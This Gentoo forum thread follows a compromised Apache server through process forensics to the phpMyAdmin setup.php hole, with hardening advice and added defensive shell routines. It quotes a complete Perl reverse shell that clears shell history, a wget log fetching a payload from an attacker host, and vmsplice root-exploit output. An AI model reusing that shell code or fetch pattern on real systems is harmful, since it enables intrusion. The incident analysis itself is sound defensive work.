Gentoo Forums :: Networking & Security
Found ./exploit running as apache
newtonian (Guru; Joined: 19 Jan 2005; Posts: 465; Location: Hokkaido Japan)
Posted: Fri Aug 06, 2010 8:02 am    Post subject: Found ./exploit running as apache

After Apache became non-responsive I ran htop and found that apache, running from ./exploit, was using up all of the CPU.

I killed the processes and all was fine. I did a find -name exploit -print from the root directory, hoping to find a file called exploit, but nothing came up.
Code:

apache    2128 52.8  0.2  34028  3812 ?        R    Aug04 2039:58 /usr/sbin/apache/logs
apache    4302 61.4  0.1  21232  1732 ?        R    Aug03 3207:05 ./exploit
root      4779  0.0  0.0   7272   732 pts/3    R+   16:21   0:00 grep --colour=auto apache
apache   22869 57.8  0.1  21232  1732 ?        R    Aug03 2707:47 ./exploit


Anyone familiar with apache running a file called exploit?

Cheers,
msalerno (Veteran; Joined: 17 Dec 2002; Posts: 1338; Location: Sweating in South Florida)
Posted: Fri Aug 06, 2010 4:08 pm

Who knows where it came from, but you are going to get lots of people telling you to wipe the box and reinstall. You should have tried to get more info about the process before you killed it.
d2_racing (Bodhisattva; Joined: 25 Apr 2005; Posts: 13047; Location: Ste-Foy, Canada)
Posted: Fri Aug 06, 2010 4:57 pm

Indeed, now that the process is gone, maybe there is a way to find more info about that exploit file.
msalerno (Veteran; Joined: 17 Dec 2002; Posts: 1338; Location: Sweating in South Florida)
Posted: Fri Aug 06, 2010 5:22 pm

Your situation inspired me to write up the following post:

https://forums.gentoo.org/viewtopic-p-6378504.html
Anarcho (Advocate; Joined: 06 Jun 2004; Posts: 2967; Location: Germany)
Posted: Fri Aug 06, 2010 5:23 pm

And maybe it would've been better to really kill (kill -9) the process as there might be a signal handler which deletes the file on SIGTERM.

But you should really try to find out how the exploit was uploaded to your filesystem. After that, reinstall the server and fix the problem!
Hu (Moderator; Joined: 06 Mar 2007; Posts: 16043)
Posted: Fri Aug 06, 2010 11:19 pm

As an addendum, if you want to stop the process, hit it with a SIGSTOP first. That cannot be blocked, so unless it has a buddy to resume it, it will suspend in response to that. After it is suspended, you can do initial forensics, and kill the process with a SIGKILL when you are done. It may have unlinked itself upon startup, which would make it more difficult to get at the underlying program.

In the meantime, check your Apache access and error logs. Perhaps you will get lucky and find what was used to upload the exploit bootstrap code.
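An added example, not code from this thread or from any poster: a POSIX shell routine that carries out the sequence Hu describes (SIGSTOP first, collect what /proc still knows, copy the binary back out through /proc/PID/exe even though it shows as "(deleted)", then SIGKILL). Function names and output file names are my own choices.

```shell
#!/bin/sh
# Added example (not from the thread).  Freeze a suspect process, harvest its
# /proc view, recover an unlinked executable, and only then kill it.

# collect_proc_artifacts PID OUTDIR
collect_proc_artifacts() {
    pid=$1
    out=$2
    [ -d "/proc/$pid" ] || { echo "no such process: $pid" >&2; return 1; }
    mkdir -p "$out"

    # SIGSTOP cannot be caught or ignored, so a SIGTERM handler that would
    # delete the binary never gets to run; the process simply freezes.
    kill -STOP "$pid" || return 1

    # cwd/exe/root are magic links: they still resolve (tagged "(deleted)")
    # after the on-disk file has been unlinked, as in the lsof output above.
    for link in cwd exe root; do
        printf '%s %s\n' "$link" "$(readlink "/proc/$pid/$link")"
    done > "$out/links.txt"

    # cmdline and environ are NUL-separated; make them readable.
    tr '\0' ' ' < "/proc/$pid/cmdline" > "$out/cmdline.txt"
    echo >> "$out/cmdline.txt"
    tr '\0' '\n' < "/proc/$pid/environ" > "$out/environ.txt"
    cp "/proc/$pid/status" "$out/status.txt"
    cp "/proc/$pid/maps" "$out/maps.txt"

    # Open descriptors: sockets, deleted .so files, log files the process holds.
    for fd in /proc/$pid/fd/*; do
        printf '%s -> %s\n' "${fd##*/}" "$(readlink "$fd")"
    done > "$out/fds.txt"

    # The kernel keeps the executable's inode alive while the process runs,
    # so copying through the exe link recovers a binary that is "(deleted)".
    cp "/proc/$pid/exe" "$out/exe.recovered" && chmod 0400 "$out/exe.recovered"
    command -v sha256sum >/dev/null && sha256sum "$out/exe.recovered" > "$out/exe.sha256"
    return 0
}

# terminate_suspect PID: SIGKILL rather than SIGTERM, for the same reason.
terminate_suspect() {
    kill -KILL "$1"
}
```

Run it as root (or as the process owner) while the process is still alive; once it has exited, the deleted inode is gone for good.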
newtonian (Guru; Joined: 19 Jan 2005; Posts: 465; Location: Hokkaido Japan)
Posted: Wed Aug 11, 2010 12:52 pm    Post subject: thanks for all of the awesome responses

Thanks for all of the awesome responses.

I found the same process running on another machine. Here is the output of msalerno's guide:
https://forums.gentoo.org/viewtopic-p-6378504.html

Code:
lsof -p 22533
COMMAND   PID   USER   FD      TYPE             DEVICE      SIZE     NODE NAME
exploit 22533 apache  cwd       DIR                8,4         0  4317251 /var/tmp/xpl/32 (deleted)
exploit 22533 apache  rtd       DIR                8,4      4096        2 /
exploit 22533 apache  txt       REG                8,4     32618  4317256 /var/tmp/xpl/32/exploit (deleted)
exploit 22533 apache  mem       REG                8,4    114952  1220694 /lib64/ld-2.6.1.so
exploit 22533 apache  mem       REG                8,4     14528  1220708 /lib64/libdl-2.6.1.so
exploit 22533 apache  mem       REG                8,4   1293456  1220702 /lib64/libc-2.6.1.so
exploit 22533 apache  DEL       REG                8,4            4317260 /var/tmp/xpl/32/exp_cheddarbay.so
exploit 22533 apache  DEL       REG                8,4            4317332 /var/tmp/xpl/32/exp_ingom0wnar.so
exploit 22533 apache  DEL       REG                8,4            4317327 /var/tmp/xpl/32/exp_moosecox.so
exploit 22533 apache  DEL       REG                8,4            4317282 /var/tmp/xpl/32/exp_paokara.so
exploit 22533 apache  DEL       REG                8,4            4317259 /var/tmp/xpl/32/exp_powerglove.so
exploit 22533 apache  DEL       REG                8,4            4317281 /var/tmp/xpl/32/exp_therebel.so
exploit 22533 apache  DEL       REG                8,4            4317258 /var/tmp/xpl/32/exp_wunderbar.so
exploit 22533 apache    0u     sock                0,4           48181637 can't identify protocol
exploit 22533 apache    1u     sock                0,4           48181637 can't identify protocol
exploit 22533 apache    2u     sock                0,4           48181637 can't identify protocol
exploit 22533 apache    3w     FIFO                0,5           48181633 pipe
exploit 22533 apache    4u     IPv4           47576424                TCP *:http (LISTEN)
exploit 22533 apache    5r     FIFO                0,5           47576437 pipe
exploit 22533 apache    6w     FIFO                0,5           47576437 pipe
exploit 22533 apache    7w      REG                8,4      1281  3875216 /var/log/apache2/ssl_error_log
exploit 22533 apache    8w      REG                8,4 340378372  3876416 /var/log/apache2/access_log
exploit 22533 apache    9w      REG                8,4      2866  3875215 /var/log/apache2/ssl_access_log
exploit 22533 apache   10w      REG                8,4      3268  3875217 /var/log/apache2/ssl_request_log
exploit 22533 apache   11w      REG                8,4         0  4440068 /var/run/ssl_mutex (deleted)
exploit 22533 apache   12w      REG                8,4 808690834  3875212 /var/log/apache2/mod_jk.log
exploit 22533 apache   13u      REG                8,4     28800  3876429 /var/log/apache2/mod_jk.shm.22136 (deleted)
exploit 22533 apache   14u      REG                8,4         1  3876438 /var/log/apache2/mod_jk.shm.22136.lock (deleted)
exploit 22533 apache   15r     0000                0,9         0 47593281 eventpoll
exploit 22533 apache   16u     sock                0,4           47625594 can't identify protocol
exploit 22533 apache   17u     IPv4           47601843                TCP server.domain.com:33369->server.domain.com:8009 (CLOSE_WAIT)
exploit 22533 apache   18u     unix 0xffff8800711796c0           47598822 socket
exploit 22533 apache   19w     FIFO                0,5           48372130 pipe
exploit 22533 apache   21w  unknown                                       /proc/22533/fd/21 (readlink: No such file or directory)


Code:
dr-xr-xr-x   5 apache apache 0 Aug 11 13:35 .
dr-xr-xr-x 156 root   root   0 Apr 22 18:52 ..
dr-xr-xr-x   2 apache apache 0 Aug 11 16:19 attr
-r--------   1 apache apache 0 Aug 11 16:19 auxv
-r--r--r--   1 apache apache 0 Aug 11 16:18 cmdline
lrwxrwxrwx   1 apache apache 0 Aug 11 16:18 cwd -> /var/tmp/xpl/32 (deleted)
-r--------   1 apache apache 0 Aug 11 16:19 environ
lrwxrwxrwx   1 apache apache 0 Aug 11 16:18 exe -> /var/tmp/xpl/32/exploit (deleted)
dr-x------   2 apache apache 0 Aug 11 13:36 fd
-r--r--r--   1 apache apache 0 Aug 11 16:18 maps
-rw-------   1 apache apache 0 Aug 11 16:19 mem
-r--r--r--   1 apache apache 0 Aug 11 16:19 mounts
-r--------   1 apache apache 0 Aug 11 16:19 mountstats
-rw-r--r--   1 apache apache 0 Aug 11 16:19 oom_adj
-r--r--r--   1 apache apache 0 Aug 11 16:19 oom_score
lrwxrwxrwx   1 apache apache 0 Aug 11 16:18 root -> /
-rw-------   1 apache apache 0 Aug 11 16:19 seccomp
-r--r--r--   1 apache apache 0 Aug 11 16:19 smaps
-r--r--r--   1 apache apache 0 Aug 11 16:18 stat
-r--r--r--   1 apache apache 0 Aug 11 16:19 statm
-r--r--r--   1 apache apache 0 Aug 11 16:18 status
dr-xr-xr-x   3 apache apache 0 Aug 11 13:35 task
-r--r--r--   1 apache apache 0 Aug 11 16:19 wchan


strace -p 22533 reported this:
Code:

pipe([20, 21])                          = 0
close(20)                               = 0
close(21)                               = 0
pipe([20, 21])                          = 0
close(20)                               = 0
close(21)                               = 0
pipe([20, 21])                          = 0
close(20)                               = 0
close(21)                               = 0
pipe([20, 21])                          = 0
close(20)                               = 0
close(21)                               = 0
pipe([20, 21])                          = 0
close(20)                               = 0
close(21, 21])                          = 0
Process 22533 detached


Code:
echo CWD `readlink /proc/22533/cwd` > ~/procinfo.log
cat ~/procinfo.log
CWD /var/tmp/xpl/32 (deleted)


Code:
 cat /proc/22533/cmdline
./exploit


Code:
 cat /proc/22533/environ
SHELL=/bin/shDEFAULTLEVEL=defaultLC_ALL=en_US.UTF-8USER=rootPATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/bin:/binPWD=/var/tmp/xpl/32LANG=en_US.UTF-8BOOTLEVEL=bootSVCNAME=apache2CONSOLETYPE=serialSHLVL=5HOME=/rootSOFTLEVEL=default_=./exploit


I got lost from cat /proc/<pid of process>/ as that is a directory on my system and I couldn't find any tar files around.

lsof -p 22533 shows a few source files; a Google search reveals that this is the Enlightenment hack. More googling led me to look in /var/tmp/

Code:
ls -la /var/tmp/
total 366468
drwxrwxrwt  5 root     root          4096 Aug  4 15:23 .
drwxr-xr-x 17 root     root          4096 Mar 14 02:51 ..
-rw-r--r--  1 apache   apache         317 Aug  4 15:21 1.txt
-rw-r--r--  1 apache   apache         317 Aug  4 15:22 2.txt
-rw-r--r--  1 apache   apache         317 Aug  4 15:23 3.txt
-rw-r--r--  1 apache   apache         892 Nov  6  2009 back.txt
drwxrwxr-x  2 portage  portage       4096 Jun  2 13:16 binpkgs
drwxrwxr-x  4 portage  portage       4096 Aug 11 15:38 portage
drwxrwxr-x  3 tomcat   tomcat        4096 Aug 10 22:56 tomcat-6
-rwxr-xr-x  1 apache   apache       10393 Feb  4  2010 vmsplic3


Code:
cat back.txt
#!/usr/bin/perl
use IO::Socket;
$system    = '/bin/bash';
$ARGC=@ARGV;
print "--== Fucking Machine ==-- \n\n";
if ($ARGC!=2) {
   print "Usage: $0 [Host] [Port] \n\n";
   die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Spawning Shell \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== Thuraya Team ==--  \n\n";
system("unset HISTFILE; unset SAVEFILE; unset HISTSAVE; history -n; unset WATCH; export HISTFILE=/dev/null ;echo --==Systeminfo==-- ; uname -a;echo;echo --==Uptime==--; w;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);


Code:
 cat 1.txt 2.txt 3.txt
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xf7e52000 .. 0xf7e84000
[-] wtf
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xf7e6f000 .. 0xf7ea1000
[-] wtf
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xf7e65000 .. 0xf7e97000
[-] wtf


found this in the error log:

Code:
--2010-08-04 00:00:11--  http://smenar.do.am/fuck.txt
Resolving smenar.do.am... 195.216.243.36
Connecting to smenar.do.am|195.216.243.36|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17247 (17K) [text/plain]
Saving to: `fuck.txt'

     0K .......... ......                                     100% 24.6K=0.7s

2010-08-04 00:00:13 (24.6 KB/s) - `fuck.txt' saved [17247/17247]


I looked for the file on the machine but it didn't exist.

Here is the call that uploaded the file to the server:
Code:

myserverip 66.7.208.173 - - [04/Aug/2010:00:00:17 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 200 14060 "http://210.48.255.38/phpmyadmin/scripts/setup.php" "Opera"
- 127.0.0.1 - - [04/Aug/2010:00:00:18 +0900] "OPTIONS * HTTP/1.0" 200 - "-" "Apache (internal dummy connection)"


Code:
 emerge --search phpmyadmin
Searching...
[ Results for search key : phpmyadmin ]
[ Applications found : 1 ]

*  dev-db/phpmyadmin
      Latest version available: 2.11.10
      Latest version installed: 2.11.9.4
      Size of files: 2,172 kB
      Homepage:      http://www.phpmyadmin.net/
      Description:   Web-based administration for MySQL database in PHP
      License:       GPL-2


I'm not sure how they hacked through phpmyadmin's setup.php as I don't have a config directory. I'll have to look for other hacks.
None of the files seem modified.

Code:
ls -l /var/www/localhost/htdocs/phpmyadmin/
total 1456
-rw-r--r--  2 root root  10873 2009-01-25 21:02 browse_foreigners.php
-rw-r--r--  2 root root    758 2009-01-25 21:02 calendar.php
-rw-r--r--  2 root root  31282 2009-01-25 21:02 ChangeLog
-rw-r--r--  2 root root   3459 2009-01-25 21:02 changelog.php
-rw-r--r--  2 root root    460 2009-01-25 21:02 chk_rel.php
-rw-r--r--  1 root root   1749 2009-01-25 21:09 config.inc.php
-rw-r--r--  2 root root   1751 2009-01-25 21:02 config.sample.inc.php
drwxr-xr-x  3 root root   4096 2009-01-25 21:02 contrib
-rw-r--r--  2 root root   1470 2009-01-25 21:02 db_create.php
-rw-r--r--  2 root root  10681 2009-01-25 21:02 db_datadict.php
-rw-r--r--  2 root root   2475 2009-01-25 21:02 db_export.php
-rw-r--r--  2 root root    471 2009-01-25 21:02 db_import.php
-rw-r--r--  2 root root  19871 2009-01-25 21:02 db_operations.php
-rw-r--r--  2 root root   7422 2009-01-25 21:02 db_printview.php
-rw-r--r--  2 root root  34751 2009-01-25 21:02 db_qbe.php
-rw-r--r--  2 root root  13999 2009-01-25 21:02 db_search.php
-rw-r--r--  2 root root    999 2009-01-25 21:02 db_sql.php
-rw-r--r--  2 root root  22432 2009-01-25 21:02 db_structure.php
-rw-r--r--  2 root root   4583 2009-01-25 21:02 docs.css
-rw-r--r--  2 root root 222262 2009-01-25 21:02 Documentation.html
-rw-r--r--  2 root root 157063 2009-01-25 21:02 Documentation.txt
-rw-r--r--  2 root root   2167 2009-01-25 21:02 error.php
-rw-r--r--  2 root root  24843 2009-01-25 21:02 export.php
-rw-r--r--  2 root root  18902 2009-01-25 21:02 favicon.ico
-rw-r--r--  2 root root  13934 2009-01-25 21:02 import.php
-rw-r--r--  2 root root   6586 2009-01-25 21:02 index.php
drwxr-xr-x  2 root root   4096 2009-01-25 21:02 js
drwxr-xr-x  2 root root   4096 2009-01-25 21:02 lang
drwxr-xr-x 10 root root   4096 2009-01-25 21:21 libraries
-rw-r--r--  2 root root    411 2009-01-25 21:02 license.php
-rw-r--r--  2 root root  15889 2009-01-25 21:02 main.php
-rw-r--r--  2 root root  26259 2009-01-25 21:02 navigation.php
-rw-r--r--  2 root root  27182 2009-01-25 21:02 pdf_pages.php
-rw-r--r--  2 root root  52735 2009-01-25 21:02 pdf_schema.php
-rw-r--r--  2 root root    360 2009-01-25 21:02 phpinfo.php
-rw-r--r--  2 root root  16613 2009-01-25 21:02 phpmyadmin.css.php
drwxr-xr-x  5 root root   4096 2009-01-25 21:02 pmd
-rw-r--r--  2 root root  11227 2009-01-25 21:02 pmd_common.php
-rw-r--r--  2 root root   1917 2009-01-25 21:02 pmd_display_field.php
-rw-r--r--  2 root root  18486 2009-01-25 21:02 pmd_general.php
-rw-r--r--  2 root root    880 2009-01-25 21:02 pmd_help.php
-rw-r--r--  2 root root   3372 2009-01-25 21:02 pmd_pdf.php
-rw-r--r--  2 root root   3942 2009-01-25 21:02 pmd_relation_new.php
-rw-r--r--  2 root root   1901 2009-01-25 21:02 pmd_relation_upd.php
-rw-r--r--  2 root root   2248 2009-01-25 21:02 pmd_save_pos.php
-rw-r--r--  2 root root   1063 2009-01-25 21:02 print.css
-rw-r--r--  2 root root   9722 2009-01-25 21:02 querywindow.php
-rw-r--r--  2 root root    403 2009-01-25 21:02 readme.php
drwxr-xr-x  2 root root   4096 2009-01-25 21:02 scripts
-rw-r--r--  2 root root   7653 2009-01-25 21:02 server_binlog.php
-rw-r--r--  2 root root   2784 2009-01-25 21:02 server_collations.php
-rw-r--r--  2 root root  13284 2009-01-25 21:02 server_databases.php
-rw-r--r--  2 root root   4917 2009-01-25 21:02 server_engines.php
-rw-r--r--  2 root root   1639 2009-01-25 21:02 server_export.php
-rw-r--r--  2 root root    486 2009-01-25 21:02 server_import.php
-rw-r--r--  2 root root 110708 2009-01-25 21:02 server_privileges.php
-rw-r--r--  2 root root   2869 2009-01-25 21:02 server_processlist.php
-rw-r--r--  2 root root    581 2009-01-25 21:02 server_sql.php
-rw-r--r--  2 root root  20731 2009-01-25 21:02 server_status.php
-rw-r--r--  2 root root   2462 2009-01-25 21:02 server_variables.php
-rw-r--r--  2 root root    317 2009-01-25 21:02 show_config_errors.php
-rw-r--r--  2 root root  29485 2009-01-25 21:02 sql.php
-rw-r--r--  2 root root   9097 2009-01-25 21:02 tbl_addfield.php
-rw-r--r--  2 root root   9463 2009-01-25 21:02 tbl_alter.php
-rw-r--r--  2 root root  46319 2009-01-25 21:02 tbl_change.php
-rw-r--r--  2 root root   9322 2009-01-25 21:02 tbl_create.php
-rw-r--r--  2 root root   2594 2009-01-25 21:02 tbl_export.php
-rw-r--r--  2 root root    635 2009-01-25 21:02 tbl_import.php
-rw-r--r--  2 root root  15997 2009-01-25 21:02 tbl_indexes.php
-rw-r--r--  2 root root   2186 2009-01-25 21:02 tbl_move_copy.php
-rw-r--r--  2 root root  19804 2009-01-25 21:02 tbl_operations.php
-rw-r--r--  2 root root  18270 2009-01-25 21:02 tbl_printview.php
-rw-r--r--  2 root root  24311 2009-01-25 21:02 tbl_relation.php
-rw-r--r--  2 root root  12626 2009-01-25 21:02 tbl_replace.php
-rw-r--r--  2 root root   4423 2009-01-25 21:02 tbl_row_action.php
-rw-r--r--  2 root root  17905 2009-01-25 21:02 tbl_select.php
-rw-r--r--  2 root root    939 2009-01-25 21:02 tbl_sql.php
-rw-r--r--  2 root root  34710 2009-01-25 21:02 tbl_structure.php
drwxr-xr-x  2 root root   4096 2009-01-25 21:02 test
drwxr-xr-x  4 root root   4096 2009-01-25 21:02 themes
-rw-r--r--  2 root root   1096 2009-01-25 21:02 themes.php
-rw-r--r--  2 root root   1752 2009-01-25 21:02 transformation_overview.php
-rw-r--r--  2 root root   4068 2009-01-25 21:02 transformation_wrapper.php
-rw-r--r--  2 root root   8209 2009-01-25 21:02 translators.html
-rw-r--r--  2 root root   3573 2009-01-25 21:02 user_password.php
-rw-r--r--  2 root root   4215 2009-01-25 21:02 view_create.php


So now I have to figure out how they got in via phpmyadmin setup.php, what and where fuck.txt is, and whether or not the vmsplice Local Root Exploit works on this xen kernel. Then rebuild the machine from scratch. : P Ouch...

Thanks for all the help so far guys.

Cheers,
Anon-E-moose (Advocate; Joined: 23 May 2008; Posts: 4897; Location: Dallas area)
Posted: Wed Aug 11, 2010 1:36 pm

I don't run phpmyadmin, but for anything that I don't want the world to see, I keep localhost separate under /var/www/ and put the things that I don't want the world to know about there.
msalerno (Veteran; Joined: 17 Dec 2002; Posts: 1338; Location: Sweating in South Florida)
Posted: Wed Aug 11, 2010 5:11 pm

Have you checked the phpmyadmin site to see if there are any security issues with the version you are running?

You could also do a "glsa-check --test all" and see what gets returned.
Hu (Moderator; Joined: 06 Mar 2007; Posts: 16043)
Posted: Thu Aug 12, 2010 2:21 am    Post subject: Re: thanks for all of the awesome responses

newtonian wrote:
More googling led me to look in /var/tmp/
Code:
ls -la /var/tmp/
total 366468
drwxrwxrwt  5 root     root          4096 Aug  4 15:23 .
drwxr-xr-x 17 root     root          4096 Mar 14 02:51 ..
-rw-r--r--  1 apache   apache         317 Aug  4 15:21 1.txt
-rw-r--r--  1 apache   apache         317 Aug  4 15:22 2.txt
-rw-r--r--  1 apache   apache         317 Aug  4 15:23 3.txt
-rw-r--r--  1 apache   apache         892 Nov  6  2009 back.txt
drwxrwxr-x  2 portage  portage       4096 Jun  2 13:16 binpkgs
drwxrwxr-x  4 portage  portage       4096 Aug 11 15:38 portage
drwxrwxr-x  3 tomcat   tomcat        4096 Aug 10 22:56 tomcat-6
-rwxr-xr-x  1 apache   apache       10393 Feb  4  2010 vmsplic3
Some of those suspicious files have rather old mtimes. This is not definitive since an mtime can be changed to an arbitrary value at will, but it could mean that you have been successfully attacked some time ago.

PHP is a frequent source of security problems. I suggest making some changes on the rebuilt server to restrict access to it. Make at least one of these changes, if at all possible. Layering several together is probably overkill, but has no significant technical drawbacks.
  • If possible, serve it from a VirtualHost that listens only to localhost.
  • Use Apache configuration directives to require HTTP-based authentication to access any file in the phpmyadmin directory hierarchy. This will provide some basic protection if an authentication bypass is found in phpmyadmin, since the attacker must still have a valid HTTP login to get past the Apache check.
  • Require HTTPS to access the site that serves phpmyadmin. This protects the credentials from the previous bullet, and may also cause some attackers to miss the presence of the directory if they probe only sites served over HTTP.
  • Install to a directory with a non-standard name, such as /admin.2eD6pw/phpmyadmin/ and do not provide any publicly readable hyperlinks that point to this directory. Choose the upper level directory name by combining a useful string ("admin") with a random string (to discourage guessing). This is a crude form of security by obscurity, but it should prevent bots from just wandering in.
Anon-E-moose (Advocate; Joined: 23 May 2008; Posts: 4897; Location: Dallas area)
Posted: Thu Aug 12, 2010 10:10 am

I would also lock down the directories and any password or other sensitive files from being read.
I used vhosts on my system, with separate directories for localhost and my dns name.
Tony Schwartz (n00b; Joined: 10 Nov 2010; Posts: 1)
Posted: Wed Nov 10, 2010 2:32 pm    Post subject: solution for me

I tracked this down to a known exploit in phpMyAdmin.
The problem for me was that I did not remove the setup.php script from the scripts directory in the phpMyAdmin installation.
There is a known exploit that is described here: http://www.nessus.org/plugins/index.php?view=single&id=48908

The problem allows an attacker to execute arbitrary PHP code.

For me, it was pretty easy to clean up the components of this problem by removing the scripts from the /tmp directory that were generated. See the .mysql.log directory and any other scripts in the tmp directory. Kill apache, make sure your phpMyAdmin doesn't have a setup.php script, and make sure all your httpd processes are dead and the /usr/sbin/apache/*** processes are dead too. Then, safely restart httpd.

Hope this helps.

T
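An added example, not part of this thread: a shell routine that scans a vhost-prefixed combined access log (the shape of the line newtonian quoted, where the request to /phpmyadmin/scripts/setup.php was answered with 200) for non-404 hits on setup.php and totals them per client, plus a second routine that performs the check Tony Schwartz describes, that an install no longer ships scripts/setup.php or a config/ directory. The sample log lines are constructed with TEST-NET addresses and the function names are my own.

```shell
#!/bin/sh
# Added example (not from the thread): two defender-side checks for the
# phpMyAdmin setup.php exposure discussed in this thread.

# flag_setup_hits LOGFILE
# Expects lines of the form:
#   <vhost> <client-ip> - - [time] "REQUEST" status bytes "referer" "agent"
# Prints one HIT line per non-404 request to scripts/setup.php, then a
# TOTAL line per client IP.
flag_setup_hits() {
    awk '
    {
        n = split($0, q, "\"")      # q[2]=request line, q[3]=" status bytes ", q[4]=referer
        if (n < 4) next             # not a combined-format line; skip it
        split(q[1], pre, " ")       # pre[1]=vhost, pre[2]=client IP
        split(q[2], req, " ")       # req[2]=request path
        split(q[3], post, " ")      # post[1]=status code
        if (req[2] ~ /\/scripts\/setup\.php/ && post[1] != "404") {
            hits[pre[2]]++
            printf "HIT %s status=%s path=%s referer=%s\n", pre[2], post[1], req[2], q[4]
        }
    }
    END { for (ip in hits) printf "TOTAL %s %d\n", ip, hits[ip] }
    ' "$1"
}

# audit_phpmyadmin DOCROOT
# Returns 1 if the install still has scripts/setup.php or a config/ directory.
audit_phpmyadmin() {
    rc=0
    if [ -e "$1/scripts/setup.php" ]; then
        echo "FAIL: $1/scripts/setup.php is still present; delete it once configured"
        rc=1
    fi
    if [ -d "$1/config" ]; then
        echo "FAIL: $1/config exists (setup.php writes its output there); remove it"
        rc=1
    fi
    [ "$rc" -eq 0 ] && echo "OK: no setup.php or config/ under $1"
    return "$rc"
}

# write_sample_log FILE: constructed sample lines (TEST-NET addresses, not
# real hosts) so the scanner can be exercised offline.
write_sample_log() {
    cat > "$1" <<'EOF'
myserverip 203.0.113.7 - - [04/Aug/2010:00:00:17 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 200 14060 "http://198.51.100.9/phpmyadmin/scripts/setup.php" "Opera"
myserverip 192.0.2.44 - - [04/Aug/2010:00:00:18 +0900] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
myserverip 203.0.113.7 - - [04/Aug/2010:00:00:19 +0900] "POST /phpmyadmin/scripts/setup.php HTTP/1.1" 200 310 "-" "Opera"
myserverip 192.0.2.45 - - [04/Aug/2010:00:00:20 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 210 "-" "curl/7.19"
EOF
}
```

A 404 on setup.php is a probe that found nothing; a 200, and especially a POST with 200, is the pattern worth alerting on.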
molot (Apprentice; Joined: 26 Feb 2005; Posts: 214; Location: Warsaw, Poland)
Posted: Wed Nov 10, 2010 7:15 pm

Depending on your php settings, "arbitrary php code" might be enough to set up another backdoor. Hardly possible, but possible. Check twice for any traces of edits like that.
Hope you'll be OK.
All times are GMT